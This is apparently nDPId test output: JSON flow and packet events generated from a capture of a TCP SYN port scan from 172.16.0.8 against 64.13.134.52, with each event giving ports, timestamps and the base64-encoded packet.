-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAspQgAADgGa2qsEAAIQA2GNIzTw1HdU4MZAAAAAGACBABxOgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsnykAADoGb0msEAAIQA2GNIzTBMHdU4MZAAAAAGACDAAnywAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsYsgAADAGtaqsEAAIQA2GNIzTBCbdU4MZAAAAAGACBAAwZgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsBCoAADcGDUmsEAAIQA2GNIzTJR\/dU4MZAAAAAGACEAADbQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsqo8AACgGdeOsEAAIQA2GNIzTF27dU4MZAAAAAGACBAAdHgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsdGkAADkGmwmsEAAIQA2GNIzTIyrdU4MZAAAAAGACCAANYgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsMAkAADMG5WmsEAAIQA2GNIzSAgzdUoMYAAAAAGACEAAmgwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsuKkAAC0GYsmsEAAIQA2GNIzSE+zdUoMYAAAAAGACCAAcowAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsn50AADoGbtWsEAAIQA2GNIzSBEPdUoMYAAAAAGACDAAoTAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsP3kAADcG0fmsEAAIQA2GNIzSOpjdUoMYAAAAAGACEADt9gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsaQ4AAC4GsWSsEAAIQA2GNIzSABPdUoMYAAAAAGACDAAsfAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsxlsAADgGShesEAAIQA2GNIzSB\/rdUoMYAAAAAGACBAAslQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsOUgAAC8G4CqsEAAIQA2GNIzSBHLdUoMYAAAAAGACEAAkHQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAshl8AADYGjBOsEAAIQA2GNIzSF0jdUoMYAAAAAGACDAAVRwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAshqYAACwGlcysEAAIQA2GNIzSCGDdUoMYAAAAAGACBAAsLwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsrlkAADsGXxmsEAAIQA2GNIzSBFLdUoMYAAAAAGACEAAkPQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsP9EAAC4G2qGsEAAIQA2GNIzSEV7dUoMYAAAAAGACDAAbMQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAs6z0AACoGMzWsEAAIQA2GNIzSFTjdUoMYAAAAAGACDAAXVwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAs56MAADUGK8+sEAAIQA2GNIzSH5XdUoMYAAAAAGACCAAQ+gAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ4kAAC8G8emsEAAIQA2GNIzSCEfdUoMYAAAAAGACEAAgSAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAskOgAADcGgIqsEAAIQA2GNIzTWZvdU4MZAAAAAGACEADO8AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdUkAADcGnCmsEAAIQA2GNIzTAZbdU4MZAAAAAGACEAAm9gAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdt4AADEGoJSsEAAIQA2GNIzTBvbdU4MZAAAAAGACCAAplgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsDDQAACoGEj+sEAAIQA2GNIzTBBrdU4MZAAAAAGACDAAocgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdKAAADUGntKsEAAIQA2GNIzTgkrdU4MZAAAAAGACCACuQQAAAgQFtA=="} 
